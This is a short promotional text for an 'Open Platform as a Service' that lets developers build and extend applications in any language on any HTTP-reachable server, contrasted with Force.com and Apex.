Open Platform as a Service brings all the application and system stakeholders together in an ecosystem which make sense. First, developers create Open Applications using any language on any server, with any any tool/framework/IDE, etc. From there it just gets better. The whole point of software is that it is manageable, modular and reusable. These strengths are leveraged in The Open Platform as a Service, not impeded like they are by entities with conflicts of interest in existing PaaS offerings.

The Open Platform as a Service is just that - Open


Developers can create ANY APPLICATION on ANY SERVER using ANY PROGRAMMING LANGUAGE - PERIOD. No caveats, no fine print, no nothing. Both programmers and non-programmers can extend existing Open Applications by adding additional Objects - this is huge! For example, lets say you search The Open Store and find an Open Application called "Data Form" which creates an HTML form "automatically" based on some database fields from a MySQL database.A developer can use this "base Open Object" and add additional functionality on her own (or any other) scripts on any server on the Internet reachable via HTTP! For example, you could connect to an Oracle database and add the necessary Objects to the base Open Application and not have to roll your own application from scratch. This is a very big advantage over simply providing a web-based framework with a proprietary programming language like Force.com and Apex, for example. By letting programmers develop whatever they can imagine and then expose that functionality to other developers, designers and business users (if they chose to do so), you get a complete application ecosystem involving programmers, designers, non-programmers, users, Web hosting companies, clouds, etc. which can sustain and grow itself with no resistance or competing interests! This type of system could only come from a company with no competing interests.